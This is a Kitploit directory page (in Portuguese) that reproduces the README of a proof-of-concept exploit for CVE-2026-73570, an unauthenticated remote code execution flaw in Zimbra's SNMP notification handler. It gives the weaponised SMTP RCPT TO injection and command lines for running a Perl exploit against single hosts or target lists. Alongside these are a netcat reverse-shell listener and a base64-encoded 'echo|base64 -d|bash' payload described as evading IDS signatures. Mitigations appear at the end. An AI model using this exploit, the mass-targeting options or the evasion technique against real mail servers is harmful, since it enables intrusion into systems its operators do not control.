Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-73570 — Zimbra SNMP Notification Injeção de Comando no Sistema Operacional — RCE não autenticado via exploit SMTP (Poc) | Kitploit
Ferramentas/GitHubGitHub/gabrielunknown/cve-2026-73570
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubgabrielunknown/cve-2026-73570

CVE-2026-73570

Zimbra SNMP Notification Injeção de Comando no Sistema Operacional — RCE não autenticado via exploit SMTP (Poc)

Ver Repositório
1há 1 diaAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-73570 — Exploit de RCE por notificação SNMP do Zimbra ZCS (PoC)

Execução remota de código não autenticada via injeção de comandos do sistema operacional no manipulador de notificações SNMP do Zimbra Collaboration Suite.


Visão geral

CampoValor
CVECVE-2026-73570
CVSS 3.18.9 ALTA — AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
CWECWE-78 — Neutralização inadequada de elementos especiais usados em um comando do sistema operacional
AfetadosZimbra ZCS < 10.1.20 (com zimbra-snmp instalado)
Corrigido emZCS 10.1.20 — julho de 2026
CISA KEVAdicionado em 2026-08-21 (prazo de remediação FCEB: 2026-08-24)
Autenticação necessáriaNenhuma
Execução comousuário do sistema operacional zimbra

Causa raiz

O pacote opcional zimbra-snmp inclui uma regra do swatchdog que monitora /var/log/zimbra.log em busca de linhas que correspondam a:

root@kitploit:~
Service status change: <NAME> changed from <STATE> to <STATE>

Quando há uma correspondência, o swatchdog passa o campo <NAME> capturado diretamente para o script de shell de notificação SNMP sem qualquer sanitização.

Um atacante não autenticado pode injetar uma entrada de log criada especialmente ao enviar um comando SMTP RCPT TO com formato específico. Usando uma parte local entre aspas do RFC 5321, metacaracteres de shell — por exemplo, $(...) — são incorporados dentro de <NAME> e executados quando o swatchdog processa a linha de log resultante.


Pré-condições

Todas as três condições devem ser verdadeiras no alvo para que a vulnerabilidade seja explorável:

  • O pacote zimbra-snmp está instalado
  • As notificações SNMP estão habilitadas (snmp_notify = true)
  • O serviço swatchdog está em execução

Fluxo do ataque

root@kitploit:~
Atacante                          MTA do Zimbra
   │                                  │
   │── TCP connect :25/:465/:587 ────►│
   │── EHLO mx-test.invalid ─────────►│
   │── MAIL FROM:<scanner@...> ──────►│
   │── RCPT TO:<"x: Service status    │
   │     change: localhost $(CMD)     │
   │     changed from stopped to      │
   │     running"@cve.invalid> ──────►│
   │                                  │── registra dados do RCPT TO ──► /var/log/zimbra.log
   │                                  │                               │
   │                                  │                         swatchdog encontra
   │                                  │                         o padrão, extrai
   │                                  │                         $(CMD), executa
   │◄─────────── retorno de chamada do shell ───────────────────────────┘
  1. Conecte-se à porta 25 / 465 / 587.
  2. Envie uma conversa SMTP padrão com o RCPT TO armado.
  3. O Zimbra registra os dados do endereço independentemente de aceitar ou rejeitar.
  4. O swatchdog encontra o padrão de log e extrai o $(CMD) injetado.
  5. O manipulador SNMP executa CMD como o usuário do sistema operacional zimbra.

Exploit

Requisitos

root@kitploit:~
cpan IO::Socket::SSL MIME::Base64 Digest::HMAC_MD5

Alvo único

root@kitploit:~
perl zimbra-poc.pl -H mail.target.com -r <SEU_IP> -R 4444

Lista de alvos

root@kitploit:~
perl zimbra-poc.pl -f targets.txt -r <SEU_IP> -R 4444

targets.txt — um host por linha, :porta opcional, linhas que começam com # são ignoradas:

root@kitploit:~
mail.example.com
mail.example.com:25
10.0.0.50:587
# comentário ignorado

Todas as opções

FlagLongoPadrãoDescrição
-H--host—Nome do host ou IP de um único alvo
-f--file—Arquivo contendo a lista de alvos
-p--port587Porta SMTP padrão
-r--rhost—Seu IP para o retorno de chamada do shell reverso
-R--rport4444Porta do ouvinte
-t--timeout15Tempo limite do soquete em segundos
-S--ssldesligadoTLS direto (ativado automaticamente na porta 465)
-v--verbosedesligadoExibe o diálogo SMTP completo
-L--logfile—Grava o log da sessão em arquivo
-h--help—Mostra a ajuda

Exemplo completo

root@kitploit:~
# Terminal 1 — iniciar ouvinte
nc -lvnp 4444

# Terminal 2 — executar exploit
perl zimbra-poc.pl -H mail.target.com -r 10.10.10.1 -R 4444 -v

Técnica de payload

O comando do shell reverso é codificado em base64 antes da injeção:

root@kitploit:~
echo <b64>|base64 -d|bash

Isso impede que IDS/IPS correspondam a assinaturas de texto simples, como /dev/tcp, bash -i ou nc -e. O blob codificado é injetado como $(...) dentro da parte local entre aspas do RCPT TO, acionando a execução no lado do servidor quando o swatchdog processa a entrada de log.


Mitigação

AçãoDetalhe
CorreçãoAtualize para Zimbra ZCS ≥ 10.1.20
Desativar notificação SNMPzmprov mcf zimbraSnmpNotifyEnabled FALSE && zmconfigdctl restart
Remover pacoteapt remove zimbra-snmp / yum remove zimbra-snmp
Controles de redeRestrinja SMTP de entrada (25/465/587) a relays confiáveis onde for operacionalmente viável

Referências

  • NVD — CVE-2026-73570
  • Avisos de segurança do Zimbra
  • Vulnerabilidades conhecidas e exploradas da CISA — CVE-2026-73570
  • Aviso do CERT.pl
  • BiuTrap/CVE-2026-73570

Aviso legal

Esta prova de conceito é divulgada apenas para testes de segurança autorizados, pesquisa acadêmica e fins defensivos.
Executá-la contra sistemas que você não possui ou para os quais não possui permissão escrita explícita para testar é ilegal.
O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por esta ferramenta.


Baixar ferramenta